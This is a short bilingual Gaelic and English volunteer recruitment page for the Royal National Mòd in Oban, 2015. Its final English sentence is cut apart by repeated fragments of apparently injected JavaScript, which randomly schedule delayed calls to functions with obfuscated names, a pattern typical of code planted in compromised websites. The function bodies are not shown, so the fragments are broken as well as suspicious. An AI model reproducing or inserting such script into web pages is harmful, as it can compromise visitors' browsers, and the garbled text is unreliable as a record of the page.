Taic Saor-thoileach / Volunteer Support

Ma tha ùidh agad taic a chur ri obair Comataidh Deasachaidh Ionadail Mòd an Òbain 2015, neo obrachadh gu saor-thoileach aig a’ Mhòd, leig fios is bidh sinn toilichte cluinntinn bhuat!

Bidh mòran iarrtais air taic saor-thoileach suas gu àm a’ Mhòid, agus aig a’ Mhòd fhèin. Tairg air an làrach linn againn.

If you would like to get involved with our committee or to volunteer at this year’s Royal National Mod, please get in touch, we would love to hear from you!

There are lots of opportunities for volunteers in the run up to andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} at this year’s Mod so volunteer online now.